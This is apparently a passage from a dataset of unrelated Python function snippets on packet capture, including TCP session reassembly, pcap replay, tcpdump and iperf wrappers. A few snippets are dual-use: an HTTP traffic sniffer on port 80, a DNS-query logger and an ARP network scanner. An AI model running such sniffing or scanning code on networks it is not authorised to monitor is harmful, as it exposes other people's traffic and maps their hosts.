process(\"/proc/net/%s\" % f, family, type_)\r\n # raise NSP if the process disappeared on us\r\n os.stat('/proc/%s' % self.pid)\r\n return ret", "def __iter__(self) -> Iterator[packets.Packet]:\n for packet in self._packets:\n yield packet\n for pointer in self._packet_pointers:\n yield pointer.get()", "def sniff_packets(iface=None):\n if iface: # (http)\n sniff(filter=\"port 80\", prn=process_packet, iface=iface, store=False)\n # 'process_packet' is the callback\n else:\n sniff(filter=\"port 80\", prn=process_packet, store=False)\n # default interface", "def start_pcap(host, pcap_file_name, interface, pcap_args='',\n func_ip=None, tool_path=None):\n with LydianClient(_get_host_ip(host, func_ip)) as client:\n client.pcap.start_pcap(pcap_file_name, interface, pcap_args, tool_path)", "def sniff_traffic(hs, count, timeout, traffic_type, pkt_type, exp_dst, step):\n iface = hs.ports['eth1']\n step('Scapy capture started')\n if (traffic_type == \"encap\"):\n packet = hs.libs.scapy.sniff2(\"iface='{}', count={}, timeout={}, \"\n \" filter='port 4789 and (!icmp or !ip6)', \"\n \" prn=lambda x:x.show()\".format(\n iface, count, timeout), True)\n parse_packet(packet, traffic_type, pkt_type, exp_dst, step=step)\n elif (traffic_type == \"decap\"):\n packet = hs.libs.scapy.sniff2(\"iface='{}', count={}, \"\n \" timeout={}, filter='!icmp or !ip6', \"\n \" prn=lambda x:x.show()\".format(\n iface, count, timeout), True)\n parse_packet(packet, traffic_type, pkt_type, exp_dst, step=step)", "def offline_pcap_input_to_pipe(pcap=None, p=None, quick=False):\n\n tdm_cnt = 0\n\n print(\"Offline mode: Reading TDMs from PCAP/PCAPNG file and writing to pipe.\")\n pkt_list = rdpcap(pcap) # read the PCAP/PCAPNG file and return a list of packets\n\n # Parse the Packet List for TmNS Data Messages (TDMs), and write them to the binary TDM file\n print(\"Named Pipe '{0}' has been opened for writing. Waiting for Pipe Reader to connect.\".format(p))\n pipeout = open(p, 'wb')\n print(\"Connected to Named Pipe '{0}'. 
Writing binary TDMs into pipe.\".format(p))\n\n delta_from_current_time = time.time() - pkt_list[0].time\n\n try:\n for pkt in pkt_list:\n if pkt[UDP].dport == TDM_PORT:\n if quick is False:\n while (pkt.time + delta_from_current_time) > time.time():\n sleep(0.0001)\n pipeout.write(bytes(pkt[UDP].payload))\n tdm_cnt += 1\n print(\"\\rTDM Count: {0}\".format(tdm_cnt), end=\" \")\n pipeout.close()\n except IOError as e:\n if e.errno == errno.EPIPE:\n print(\"\\nBroken Pipe: EPIPE\")\n print(\"\")\n\n if tdm_cnt == 0:\n print(\"ZERO TmNS Data Messages found in {0}. No data written to {1}.\".format(pcap, p))\n else:\n print(\"\\nThere were {0} TmNS Data Messages written to {1}.\".format(tdm_cnt, p))", "def iterate(cls, disc, track_number):\n\n assert track_number >= 0 and track_number < len(disc.tracks)\n\n track = disc.tracks[track_number]\n\n packet_frame_size = (\n disc.audio_format.rate / cls.PACKETS_PER_SECOND)\n\n # Mock up a packet that ends at the start of index 1, so the\n # first packet generated starts at that position\n p = cls(disc, track, track_number, track.pregap_offset, 0)\n\n while True:\n # Calculate offsets of next packet\n abs_pos = p.abs_pos + p.length\n\n if abs_pos < track.pregap_offset:\n length = min(track.pregap_offset - abs_pos, packet_frame_size)\n else:\n length = min(track.length - abs_pos, packet_frame_size)\n\n assert length >= 0\n\n if length == 0:\n # Reached end of track, switch to next. Simplify this\n # code by generating a dummy packet for the next\n # iteration to work on (but don't yield it!)\n\n track_number += 1\n\n try:\n track = disc.tracks[track_number]\n except IndexError:\n # That was the last track, no more packets\n return\n\n p = cls(disc, track, track_number, 0, 0)\n\n else:\n # Generate next packet\n flags = 0\n if (track.pause_after\n and abs_pos + length == track.length\n and track_number + 1 < len(disc.tracks)):\n flags |= p.PAUSE_AFTER\n\n p = cls(disc, track, track_number, abs_pos, length, flags)\n yield p", "def IperfTCP(target_src, target_dst, dst, length, window=None):\n iperf = IperfSet(target_src, target_dst, dst)\n iperf.Start(length, None, window)\n return iperf.Results()", "def _process(self, buf, ts=None, pkt_num=None):\n\n if not buf:\n return\n self.pkt_num = pkt_num\n eth = dpkt.ethernet.Ethernet(buf)\n ip = eth.data\n tcp = ip.data\n sip = inet_to_str(ip.src)\n dip = inet_to_str(ip.dst)\n fin_flag = tcp.flags & 0x001\n ack_flag = tcp.flags & 0x010\n syn_flag = tcp.flags & 0x002\n rst_flag = tcp.flags & 0x004\n syn_unacceptable_states = [TCPState.ESTABLISHED, TCPState.FIN_WAIT_1, TCPState.FIN_WAIT_2,\n TCPState.CLOSING, TCPState.LAST_ACK]\n data_acceptable_states = [TCPState.ESTABLISHED, TCPState.CLOSE_WAIT]\n tcp_opts = dpkt.tcp.parse_opts(tcp.opts) if tcp.opts else None\n tcp_opts = tcp_opts_tuple_list_to_dict(tcp_opts) if tcp_opts else None\n num_pkt_session_pkt = len(self.sessions[self.session_count]) if self.session_count else 0\n\n # Only Window size can change in ACKs (in other words - after SYNs), nothing else like - window-scaling, or\n # MSS, or Selective-SYN can't be changed. 
If present in options after SYN, should be ignored in my opinion\n # https://superuser.com/questions/966212/does-the-sequence-number-of-tcp-packet-headers-wrap-around\n # TODO: seq number in coming packet is ahead of the expected one, then it should be held for processing\n\n def slide_window():\n\n if len(self.sessions[self.session_count]):\n if sip == self.sip:\n if self._s_mss != -1 and get_tcp_packet_payload_len_with_options(eth) > self._s_mss:\n return\n prev_ip = dpkt.ethernet.Ethernet(self.get_last_c_pkt()).data\n rcv_nxt = self._s_rcv_next\n win_left_end = self._s_win_left_edge\n early_pkts = self._s_early_pkts\n other_end_win_size = self._s_win_size\n current_state = self._c_state\n else:\n if self._c_mss != -1 and get_tcp_packet_payload_len_with_options(ip) > self._c_mss:\n return\n prev_ip = dpkt.ethernet.Ethernet(self.get_last_s_pkt()).data\n rcv_nxt = self._c_rcv_next\n win_left_end = self._c_win_left_edge\n early_pkts = self._c_early_pkts\n other_end_win_size = self._c_win_size\n current_state = self._s_state\n if self._print_debug_info:\n logger.debug(self.client_server_next_rcv(), tcp_pkt_debug_info(ip))\n prev_tcp = prev_ip.data\n prev_tcp_data_offset = prev_tcp.off * 4\n prev_ip_header_len = prev_ip.hl * 4\n prev_tcp_payload_len = prev_ip.len - (prev_tcp_data_offset + prev_ip_header_len)\n tcp_payload_len = get_tcp_packet_payload_len(ip)\n if (tcp_seq_number_in_window(win_left_end, tcp.seq, other_end_win_size) or\n tcp_seq_number_in_window(win_left_end,\n inc_tcp_seq_number(tcp.seq, tcp_payload_len), other_end_win_size)):\n if inc_tcp_seq_number(tcp.seq, tcp_payload_len) == rcv_nxt:\n \"\"\"\n \n Since there is no new payload sent, just store the tcp packet with empty payload.\n This is going to increase the packet count but not going to add duplicated data\n in session data, by session data here it means actual data sent (after discarding\n the retransmission) to application layer. To do that - we will empty out the payload,\n if packets has some, then add the packet to the session, else add the empty packet as it is\n to the session. This logic will easily handle the TCP connections supporting\n TCP Timestamp options describe in https://tools.ietf.org/html/rfc1323\n \n \"\"\"\n # one case is when seq number is < rcv_nxt but sender want to ack more data\n # which means it is sending the same data again but its acking more received content\n \"\"\"\n 1. packet has Data\n a. prev_packet has data\n A. header change (change cur packet and change previous packet) add to list\n B. no header change retransmission ( sum check)\n b. prev_packete has no data\n A. header change (change cur packet only) add to list\n B. no header change retransmission (change cur packet only)\n 2. packet has no data\n a. prev_packet has data\n A. header change (change previous packet only) add to list\n B. no header change (change previous packet only)\n b. prev_packet has no data\n A. header change (sum check) add to list\n B. 
no header change retransmission (sum check)\n \"\"\"\n if prev_tcp.sum == tcp.sum:\n cur_sum = tcp_shasum_calc(ip.src, ip.dst, ip.p, ip.data.pack())\n prev_sum = tcp_shasum_calc(prev_ip.src, prev_ip.dst, prev_ip.p, prev_ip.data.pack())\n if cur_sum == prev_sum:\n # covers 1.a.B and 2.b.B\n return\n\n empty_prev_ip = copy.deepcopy(prev_ip)\n empty_prev_tcp = empty_prev_ip.data\n empty_prev_tcp.seq = rcv_nxt\n empty_prev_ip.len -= prev_tcp_payload_len\n empty_prev_tcp.data = b\"\"\n empty_prev_ip = tcp_fix_checksum(empty_prev_ip)\n new_part_ip = copy.deepcopy(ip)\n new_part_tcp = new_part_ip.data\n new_part_tcp.data = b\"\"\n new_part_tcp.seq = rcv_nxt\n new_part_ip.len -= tcp_payload_len\n new_part_ip.sum = 0\n new_part_tcp.sum = 0\n new_part_ip = tcp_fix_checksum(new_part_ip)\n eth.data = new_part_ip\n cur_pkt = eth.pack()\n new_pkt = dpkt.ethernet.Ethernet(cur_pkt)\n new_part_ip = new_pkt.data\n new_part_tcp = new_part_ip.data\n\n \"\"\"\n Checksum comparision logic is kept to discard the straight duplicates packets\n without Timestamp Options. These kind of packet will not serve any purposes.\n If removal of these checksum comparison code blocks felt necessary, it could\n be removed -- that will add few extra retransmitted packets -- but that would\n also requrie to update the testcases built around this code blocks.\n \"\"\"\n if new_part_tcp.sum == empty_prev_tcp.sum:\n # covers 1.b.B\n # covers case 2.a.B\n if tcp_shasum_calc(ip.src, ip.dst, ip.p, ip.data.pack()) == tcp_shasum_calc(\n prev_ip.src, prev_ip.dst, prev_ip.p, empty_prev_ip.data.pack()):\n return\n \"\"\"\n needs to added to list under cases 2.a.A, 2.b.A, 1.a.A and 1.b.A\n cur_pkt is updated earlier\n \"\"\"\n if sip == self.sip:\n if inc_tcp_seq_number(self._c_rcv_next, 1) <= new_part_tcp.ack:\n self._c_rcv_next = new_part_tcp.ack\n else:\n if inc_tcp_seq_number(self._s_rcv_next, 1) <= new_part_tcp.ack:\n self._s_rcv_next = new_part_tcp.ack\n elif (current_state in data_acceptable_states and\n tcp_seq_number_in_window(tcp.seq, rcv_nxt, tcp_payload_len)):\n stale_data_len = seq_numbers_diff(tcp.seq, rcv_nxt)\n win_right_end = inc_tcp_seq_number(win_left_end, other_end_win_size)\n if tcp_seq_number_in_window(rcv_nxt, inc_tcp_seq_number(tcp.seq, tcp_payload_len),\n seq_numbers_diff(rcv_nxt, win_right_end)):\n tcp.data = tcp.data[stale_data_len:]\n else:\n allowed_payload_size = seq_numbers_diff(rcv_nxt, win_right_end)\n remaining_eth = dpkt.ethernet.Ethernet(eth.pack())\n #remaining_ip = eth.data\n #remaining_tcp = remaining_ip.data\n remaining_eth.data.data.seq = inc_tcp_seq_number(tcp.seq, stale_data_len + allowed_payload_size)\n remaining_eth.data.data.data = tcp.data[stale_data_len + allowed_payload_size:]\n remaining_eth.data.len -= stale_data_len + allowed_payload_size\n remaining_eth.data = tcp_fix_checksum(remaining_eth.data)\n #remaining_eth.data = remaining_ip\n tcp.data = tcp.data[stale_data_len: stale_data_len + allowed_payload_size]\n if self.sip == sip:\n self._s_early_pkts.append(((ts, self.pkt_num), remaining_eth.pack()))\n else:\n self._c_early_pkts.append(((ts, self.pkt_num), remaining_eth.pack()))\n tcp.sum = 0\n # ip.len -= stale_data_len\n tcp.seq = rcv_nxt\n ip.data = tcp\n ip.sum = 0\n eth.data = ip\n cur_pkt = eth.pack()\n if sip == self.sip:\n self._s_rcv_next = inc_tcp_seq_number(self._s_rcv_next,\n (ip.len - (ip.hl * 4 + tcp.off * 4)))\n else:\n self._c_rcv_next = inc_tcp_seq_number(self._c_rcv_next,\n (ip.len - (ip.hl * 4 + tcp.off * 4)))\n elif (current_state in data_acceptable_states and\n 
tcp_seq_number_in_window(rcv_nxt, tcp.seq, other_end_win_size)):\n # hold it for further processing\n if self.sip == sip:\n self._s_early_pkts.append(((ts, self.pkt_num), buf))\n else:\n self._c_early_pkts.append(((ts, self.pkt_num), buf))\n return\n else:\n return\n self.sessions[self.session_count].append(((ts, self.pkt_num), cur_pkt))\n # as this packet is accepted, might need to update the rwnd size and left end of rwnd\n if sip == self.sip:\n self._c_payload_size += len(eth.data.data.data)\n logger.debug(\"Client send data size: {}. Accepted data size is: {}.\"\n \" Total data sent from client is: {}\".format(\n len(tcp.data), len(eth.data.data.data), self._c_payload_size))\n self._c_prev_pkt_ind = len(self.sessions[self.session_count]) - 1\n rcv_nxt = self._s_rcv_next\n if (not tcp.ack == self._c_win_left_edge and\n tcp_seq_number_in_window(inc_tcp_seq_number(self._c_win_left_edge, 1),\n tcp.ack, self._c_win_size)):\n self._c_win_left_edge = tcp.ack\n self._c_win_size = tcp.win << self._c_win_scaling_factor\n else:\n self._s_payload_size += len(eth.data.data.data)\n logger.debug(\"Server send data of size: {}. Accepted data size is: {}.\"\n \" Total data sent from server is: {}\".format(\n len(tcp.data), len(eth.data.data.data), self._s_payload_size))\n self._s_prev_pkt_ind = len(self.sessions[self.session_count]) - 1\n rcv_nxt = self._c_rcv_next\n # left edge is incremented by one becuase in_window function checks for inclusive seq number\n # starting at left edge but ACK tells what's the next expected seq number, which could be 1 next\n # to the end of window\n if (not tcp.ack == self._s_win_left_edge and\n tcp_seq_number_in_window(inc_tcp_seq_number(self._s_win_left_edge, 1),\n tcp.ack, self._s_win_size)):\n self._s_win_left_edge = tcp.ack\n self._s_win_size = tcp.win << self._s_win_scaling_factor\n # check if packet at the head of queue is ready to be processed\n while True:\n if len(early_pkts) == 0:\n break\n (_ts, _pkt_num), _buf = early_pkts.popleft()\n early_eth = dpkt.ethernet.Ethernet(_buf)\n early_ip = early_eth.data\n early_tcp = early_ip.data\n if tcp_seq_number_in_window(early_tcp.seq, rcv_nxt, get_tcp_packet_payload_len(early_ip)):\n # if early_tcp.seq <= rcv_nxt:\n self._process(early_eth.pack(), _ts, _pkt_num)\n else:\n early_pkts.appendleft(((_ts, _pkt_num), early_eth.pack()))\n break\n\n \"\"\"\n TCP flags:0x000 (12 bits)\n [11 10 9 8 7 6 5 4 3 2 1 0]\n - Bit 11 10 9: reserved\n - Bit 8: nonce\n - Bit 7: CWR (Congestion window reduced)\n - Bit 6: ECN-Echo (Explicit Congestion Notification)\n - Bit 5: Urgent\n - Bit 4: ACK\n - Bit 3: Push\n - Bit 2: Reset\n - Bit 1: SYN\n - Bit 0: FIN\n \"\"\"\n\n \"\"\"TCP flags for SYN [000000010111]\"\"\"\n\n prev_c_pkt = dpkt.ethernet.Ethernet(self.get_last_c_pkt()) if self.get_last_c_pkt() else None\n prev_c_tcp = prev_c_pkt.data.data if prev_c_pkt else None\n prev_s_pkt = dpkt.ethernet.Ethernet(self.get_last_s_pkt()) if self.get_last_s_pkt() else None\n prev_s_tcp = prev_s_pkt.data.data if prev_s_pkt else None\n logger.debug(tcp_pkt_debug_info(ip))\n logger.debug(tcp_pkt_options_debug_info(tcp))\n logger.debug(\"Processing packet number: {} in the current session\".format(self.pkt_num))\n if rst_flag:\n logger.info(\"Received a RESET flag, packet info: {}\".format(tcp_pkt_debug_info(ip)))\n logger.info(\"TCP state before processing of packet: {}\".format(self.get_printable_state()))\n if self._c_state == TCPState.CLOSED and self._s_state == TCPState.LISTENING:\n self.session_count += 1\n self.sessions[self.session_count] = 
[((ts, self.pkt_num), buf)]\n self._c_state = self._s_state = TCPState.CLOSED\n logger.info(\"TCP state after processing of packet: {}\".format(self.get_printable_state()))\n return\n self._c_state = self._s_state = TCPState.CLOSED\n if self.sip == sip:\n self._c_prev_pkt_ind = len(self.sessions[self.session_count])\n else:\n self._s_prev_pkt_ind = len(self.sessions[self.session_count])\n self.sessions[self.session_count].append(((ts, self.pkt_num), buf))\n logger.info(\"TCP state after processing of packet: {}\".format(self.get_printable_state()))\n elif syn_flag and (self._c_state in syn_unacceptable_states or self._s_state in syn_unacceptable_states):\n logger.info(\"Received a unacceptable SYN flag, packet info: {}\".format(tcp_pkt_debug_info(ip)))\n logger.info(\"TCP state before processing of packet: {}\".format(self.get_printable_state()))\n self._s_state = self._c_state = TCPState.CLOSED\n self.sessions[self.session_count].append(((ts,self.pkt_num), buf))\n logger.info(\"TCP state after processing of packet: {}\".format(self.get_printable_state()))\n elif (self._c_state == TCPState.CLOSED and self._s_state == TCPState.LISTENING and\n self.sip == sip):\n if tcp.flags & 0x017 == 0x002:\n self.session_count += 1\n logger.info(\"number of sessions so far: {}\".format(self.session_count - 1))\n logger.info(\"starting a new session, pkt info: {}\".format(tcp_pkt_debug_info(ip)))\n logger.info(\"TCP state before processing of packet: {}\".format(self.get_printable_state()))\n self.sessions[self.session_count] = []\n self._c_prev_pkt_ind = len(self.sessions[self.session_count])\n self.sessions[self.session_count].append(((ts, self.pkt_num), buf))\n self._c_state = TCPState.SYN_SENT\n self._s_state = TCPState.SYN_RECEIVED\n self._c_seq = tcp.seq\n if tcp_opts:\n if dpkt.tcp.TCP_OPT_WSCALE in tcp_opts:\n self._c_win_scaling_factor = int.from_bytes(tcp_opts[dpkt.tcp.TCP_OPT_WSCALE], \"big\")\n if dpkt.tcp.TCP_OPT_MSS in tcp_opts:\n self._c_mss = int.from_bytes(tcp_opts[dpkt.tcp.TCP_OPT_MSS], \"big\")\n else:\n self._c_win_scaling_factor = 0\n self._c_mss = -1\n self._c_win_size = tcp.win << self._c_win_scaling_factor\n logger.info(\"SYN flag from: {}:{}. 
Full TCP Flag is: {}\".format(self.sip, self.sp, hex(tcp.flags)))\n logger.info(\"TCP options in the packet: {}\".format(tcp_pkt_options_debug_info(tcp)))\n\n elif self._c_state == TCPState.SYN_SENT and self._s_state == TCPState.SYN_RECEIVED:\n logger.info(\"TCP packet info: {}\".format(tcp_pkt_debug_info(ip)))\n logger.info(\"TCP state before processing of packet: {}\".format(self.get_printable_state()))\n if self.sip == dip:\n exp_ack = inc_tcp_seq_number(prev_c_tcp.seq, 1)\n if not (tcp.flags & 0x017 == 0x012):\n self.sessions[self.session_count].append(((ts, self.pkt_num), buf))\n self._s_state = self._c_state = TCPState.CLOSED\n logger.info(\"SYN-ACK flag is not set in the TCP flags: {} from: {}:{}\".format(hex(tcp.flags),\n self.dip, self.dp))\n return\n if tcp.ack == exp_ack:\n self._s_prev_pkt_ind = len(self.sessions[self.session_count])\n self._s_rcv_next = exp_ack\n self._s_win_left_edge = exp_ack\n self.sessions[self.session_count].append(((ts, self.pkt_num), buf))\n if tcp_opts:\n if dpkt.tcp.TCP_OPT_WSCALE in tcp_opts:\n self._s_win_scaling_factor = int.from_bytes(tcp_opts[dpkt.tcp.TCP_OPT_WSCALE], \"big\")\n if dpkt.tcp.TCP_OPT_MSS in tcp_opts:\n self._s_mss = int.from_bytes(tcp_opts[dpkt.tcp.TCP_OPT_MSS], \"big\")\n else:\n self._s_win_scaling_factor = 0\n self._s_mss = -1\n self._s_win_size = tcp.win << self._s_win_scaling_factor\n logger.info(\"SYN-ACK flag from: {}:{}. Full TCP flag is: {}\".format(\n self.dip, self.dp, hex(tcp.flags)))\n logger.info(\"TCP options in the packet: {}\".format(tcp_pkt_options_debug_info(tcp)))\n elif prev_s_tcp:\n exp_ack = inc_tcp_seq_number(prev_s_tcp.seq, 1)\n if tcp.flags & 0x017 == 0x010:\n if tcp.ack == exp_ack and tcp.seq == prev_s_tcp.ack:\n self._s_state = self._c_state = TCPState.ESTABLISHED\n self._c_seq = tcp.seq\n self._c_prev_pkt_ind = len(self.sessions[self.session_count])\n self._c_rcv_next = exp_ack\n self._c_win_left_edge = exp_ack\n self.sessions[self.session_count].append(((ts, self.pkt_num), buf))\n self._c_win_size = tcp.win << self._c_win_scaling_factor\n logger.info(\"TCP handshake complete.\")\n else:\n self._s_state = self._c_state = TCPState.CLOSED\n self.sessions[self.session_count].append(((ts, self.pkt_num), buf))\n logger.info(\"TCP handshake was not completed.\")\n logger.info(\"TCP state after processing of packet: {}\".format(self.get_printable_state()))\n elif self._c_state == TCPState.ESTABLISHED and self._s_state == TCPState.ESTABLISHED:\n if ack_flag:\n \"\"\" if ACK flag is off drop the segment as per:\n https://tools.ietf.org/html/rfc793#page-37\n \"\"\"\n logger.debug(tcp_pkt_debug_info(ip))\n logger.debug(tcp_pkt_options_debug_info(tcp))\n num_pkt_session_pkt = len(self.sessions[self.session_count])\n slide_window()\n if num_pkt_session_pkt < len(self.sessions[self.session_count]) and fin_flag:\n logger.info(\"Received a FIN flag: {}\".format(tcp_pkt_debug_info(ip)))\n if self.sip == sip:\n self._c_state = TCPState.FIN_WAIT_1\n else:\n self._s_state = TCPState.FIN_WAIT_1\n logger.info(\"TCP state after processing of packet: {}\".format(self.get_printable_state()))\n elif self._c_state == TCPState.FIN_WAIT_1 and self._s_state == TCPState.ESTABLISHED:\n if ack_flag:\n slide_window()\n if num_pkt_session_pkt < len(self.sessions[self.session_count]) and sip == self.dip:\n if inc_tcp_seq_number(prev_c_tcp.seq, max(get_tcp_packet_payload_len(prev_c_pkt), 1)) == tcp.ack:\n logger.info(\"Received a ACK for FIN flag: {}\".format(tcp_pkt_debug_info(ip)))\n self._c_state = TCPState.FIN_WAIT_2\n self._s_state = 
TCPState.CLOSE_WAIT\n logger.info(\"TCP state after processing of packet: {}\".format(self.get_printable_state()))\n if fin_flag:\n logger.info(\"Received FIN flag: {}\".format(tcp_pkt_debug_info(ip)))\n if self._c_state == TCPState.FIN_WAIT_1:\n self._s_state = self._c_state = TCPState.CLOSING\n else:\n self._s_state = TCPState.LAST_ACK\n logger.info(\"TCP state after processing of packet: {}\".format(self.get_printable_state()))\n elif self._s_state == TCPState.FIN_WAIT_1 and self._c_state == TCPState.ESTABLISHED:\n if ack_flag:\n slide_window()\n if num_pkt_session_pkt < len(self.sessions[self.session_count]) and sip == self.sip:\n if inc_tcp_seq_number(prev_s_tcp.seq, max(get_tcp_packet_payload_len(prev_s_pkt), 1)) == tcp.ack:\n logger.info(\"Received a ACK for FIN flag: {}\".format(tcp_pkt_debug_info(ip)))\n self._s_state = TCPState.FIN_WAIT_2\n self._c_state = TCPState.CLOSE_WAIT\n logger.info(\"TCP state after processing of packet: {}\".format(self.get_printable_state()))\n if fin_flag:\n logger.info(\"Received FIN flag: {}\".format(tcp_pkt_debug_info(ip)))\n if self._s_state == TCPState.FIN_WAIT_1:\n self._s_state = self._c_state = TCPState.CLOSING\n else:\n self._c_state = TCPState.LAST_ACK\n logger.info(\"TCP state after processing of packet: {}\".format(self.get_printable_state()))\n elif self._c_state == TCPState.FIN_WAIT_2:\n if sip == self.sip:\n if ack_flag:\n slide_window()\n if self._s_state == TCPState.LAST_ACK:\n if (num_pkt_session_pkt < len(self.sessions[self.session_count]) and\n inc_tcp_seq_number(prev_s_tcp.seq,\n max(get_tcp_packet_payload_len(prev_s_pkt), 1)) == tcp.ack):\n logger.info(\"ACKed FIN flag: {}\".format(tcp_pkt_debug_info(ip)))\n self._c_state = self._s_state = TCPState.CLOSED\n logger.info(\"TCP state after processing of packet: {}\".format(self.get_printable_state()))\n else:\n if self._s_state == TCPState.CLOSE_WAIT and ack_flag:\n slide_window()\n if num_pkt_session_pkt < len(self.sessions[self.session_count]) and fin_flag:\n logger.info(\"Received FIN flag: {}\".format(tcp_pkt_debug_info(ip)))\n self._s_state = TCPState.LAST_ACK\n logger.info(\"TCP state after processing of packet: {}\".format(self.get_printable_state()))\n elif self._s_state == TCPState.FIN_WAIT_2:\n if sip == self.dip:\n if ack_flag:\n slide_window()\n if (self._c_state == TCPState.LAST_ACK and\n num_pkt_session_pkt < len(self.sessions[self.session_count]) and\n inc_tcp_seq_number(prev_c_tcp.seq,\n max(get_tcp_packet_payload_len(prev_c_pkt), 1)) == tcp.ack):\n logger.info(\"ACKed FIN flag: {}\".format(tcp_pkt_debug_info(ip)))\n self._s_state = self._c_state = TCPState.CLOSED\n logger.info(\"TCP state after processing of packet: {}\".format(self.get_printable_state()))\n else:\n if self._c_state == TCPState.CLOSE_WAIT and ack_flag:\n slide_window()\n if num_pkt_session_pkt < len(self.sessions[self.session_count]) and fin_flag:\n logger.info(\"Received FIN flag: {}\".format(tcp_pkt_debug_info(ip)))\n self._c_state = TCPState.LAST_ACK\n logger.info(\"TCP state after processing of packet: {}\".format(self.get_printable_state()))\n elif self._c_state == TCPState.CLOSING or self._s_state == TCPState.CLOSING:\n if ack_flag:\n slide_window()\n if sip == self.sip and num_pkt_session_pkt < len(self.sessions[self.session_count]):\n if inc_tcp_seq_number(ack_flag and prev_s_tcp.seq, 1) == tcp.ack:\n logger.info(\"ACKed FIN flag: {}\".format(tcp_pkt_debug_info(ip)))\n self._s_state = TCPState.CLOSED\n logger.info(\"TCP state after processing of packet: 
{}\".format(self.get_printable_state()))\n else:\n if num_pkt_session_pkt < len(self.sessions[self.session_count]) and \\\n inc_tcp_seq_number(ack_flag and prev_c_tcp.seq, 1) == tcp.ack:\n logger.info(\"ACKed FIN flag: {}\".format(tcp_pkt_debug_info(ip)))\n self._c_state = TCPState.CLOSED\n logger.info(\"TCP state after processing of packet: {}\".format(self.get_printable_state()))\n else:\n logger.info(\"Packet didn't match any valid state: {}\".format(tcp_pkt_debug_info(ip)))\n #self._s_state = self._c_state = TCPState.CLOSED\n logger.info(\"TCP state after processing of packet: {}\".format(self.get_printable_state()))\n logger.debug(self.get_printable_state())", "def start_capture(self, interface, count=0, ptype='', pfilter=None,\n callback=None, callback_args=None, save_dump_file=False,\n save_dump_filename=None):\n tcpd = (self.packet_captures[interface]\n if interface in self.packet_captures\n else TCPDump())\n \"\"\" :type: TCPDump \"\"\"\n\n self.LOG.debug('Starting tcpdump on host: ' + self.name)\n\n old_log = self.cli.log_cmd\n if self.debug:\n self.cli.log_cmd = True\n\n tcpd.start_capture(cli=self.cli, interface=interface, count=count,\n packet_type=ptype, pcap_filter=pfilter,\n callback=callback, callback_args=callback_args,\n save_dump_file=save_dump_file,\n save_dump_filename=save_dump_filename,\n blocking=False)\n\n self.cli.log_cmd = old_log\n\n self.packet_captures[interface] = tcpd", "def tcp_pkt_debug_info(pkt: dpkt.ip.IP) -> str:\n if isinstance(pkt, dpkt.ip.IP):\n paylod_len = pkt.len - (4 * pkt.hl) - (4 * pkt.data.off)\n return \"{}:{}-> {}:{}, seq: {}, ack:{}, flag:{}, payload len: {}, payload: {}, sum: {}\".format(\n inet_to_str(pkt.src), pkt.data.sport, inet_to_str(pkt.dst), pkt.data.dport, hex(pkt.data.seq),\n hex(pkt.data.ack), hex(pkt.data.flags), hex(paylod_len), pkt.data.data, hex(pkt.data.sum))", "def process_pkt_from_client(ts_delta, acks, nb_acks, connections, tcp, ip, saddr, daddr, sport, dport, fin_flag):\n if acks[saddr, sport, daddr, dport][co.S2C] >= 0:\n conn_id = acks[saddr, sport, daddr, dport][co.CONN_ID]\n connections[conn_id].flow.attr[co.S2C][co.TIME_LAST_ACK_TCP] = ts_delta\n if fin_flag:\n connections[conn_id].flow.attr[co.S2C][co.TIME_FIN_ACK_TCP] = ts_delta\n\n bytes_acked = (tcp.ack - acks[saddr, sport, daddr, dport][co.S2C]) % 4294967296\n if bytes_acked >= 2000000000:\n # Ack of 2GB or more is just not possible here\n return\n\n increment_value_dict(nb_acks[co.S2C][conn_id], bytes_acked)\n size_payload = ip.len - ip.hl * 4 - tcp.off * 4\n\n # If SOCKS command\n if size_payload == 7 and connections[conn_id].attr.get(co.SOCKS_PORT, None) is None:\n crypted_socks_cmd = tcp.data\n # This is possible because of packet stripping\n if len(crypted_socks_cmd) == 7:\n decrypted_socks_cmd = socks_parser.decode(crypted_socks_cmd)\n if decrypted_socks_cmd[0] == b'\\x01': # Connect\n connections[conn_id].attr[co.SOCKS_DADDR] = socks_parser.get_ip_address(decrypted_socks_cmd)\n connections[conn_id].attr[co.SOCKS_PORT] = socks_parser.get_port_number(decrypted_socks_cmd)\n\n if size_payload > 0 and tcp.seq in acks[saddr, sport, daddr, dport][SEQ_C2S]:\n # This is a retransmission! 
(take into account the seq overflow)\n connections[conn_id].flow.attr[co.C2S][co.TIME_LAST_PAYLD_WITH_RETRANS_TCP] = ts_delta\n connections[conn_id].flow.attr[co.C2S][co.TIMESTAMP_RETRANS].append((ts_delta,\n ts_delta - acks[saddr, sport, daddr, dport][HSEQ_C2S][tcp.seq][0],\n ts_delta - acks[saddr, sport, daddr, dport][HSEQ_C2S][tcp.seq][1],\n ts_delta - acks[saddr, sport, daddr, dport][co.TIMESTAMP][CLIENT]))\n acks[saddr, sport, daddr, dport][HSEQ_C2S][tcp.seq][1] = ts_delta\n elif size_payload > 0:\n acks[saddr, sport, daddr, dport][SEQ_C2S].add(tcp.seq)\n connections[conn_id].flow.attr[co.C2S][co.TIME_LAST_PAYLD_WITH_RETRANS_TCP] = ts_delta\n connections[conn_id].flow.attr[co.C2S][co.TIME_LAST_PAYLD_TCP] = ts_delta\n acks[saddr, sport, daddr, dport][HSEQ_C2S][tcp.seq] = [ts_delta, ts_delta]\n # Don't think will face this issue\n# if len(acks[saddr, sport, daddr, dport][SEQ][co.C2S]) >= 3000000:\n# for x in range(50000):\n# acks[saddr, sport, daddr, dport][SEQ][co.C2S].popleft()\n\n acks[saddr, sport, daddr, dport][co.S2C] = tcp.ack\n acks[saddr, sport, daddr, dport][co.TIMESTAMP][CLIENT] = ts_delta", "def query_sniff(pkt):\n if IP in pkt:\n ip_src = pkt[IP].src\n ip_dst = pkt[IP].dst\n\n if pkt.haslayer(DNS) and pkt.getlayer(DNS).qr == 0:\n domain = pkt.getlayer(DNS).qd.qname.decode(\"utf-8\")\n now = datetime.now()\n stored_dns_requests.update({datetime.timestamp(now): domain})\n print(\"SRC: {} - DST: {} : {}\".format(ip_src, ip_dst, domain))", "def _get_next_packet(self):\n raise NotImplementedError(\"Do not instantiate csvAbstractReader directly.\")", "def receive_captured_list(self):\n reply = self.socket.recv(4096)\n print(\"Pokemon capturados\")\n print(reply[1:].decode())", "def scan(ip):\n arp_request = scapy.ARP(pdst=ip)\n broadcast = scapy.Ether(dst=\"ff:ff:ff:ff:ff:ff\")\n arp_request_broadcast = broadcast/arp_request\n answered_list = scapy.srp(arp_request_broadcast , timeout = 1, verbose=False)[0]\n target_list=[]\n for element in answered_list:\n target_dict = {\"ip\":element[1].psrc, \"mac\":element[1].hwsrc}\n 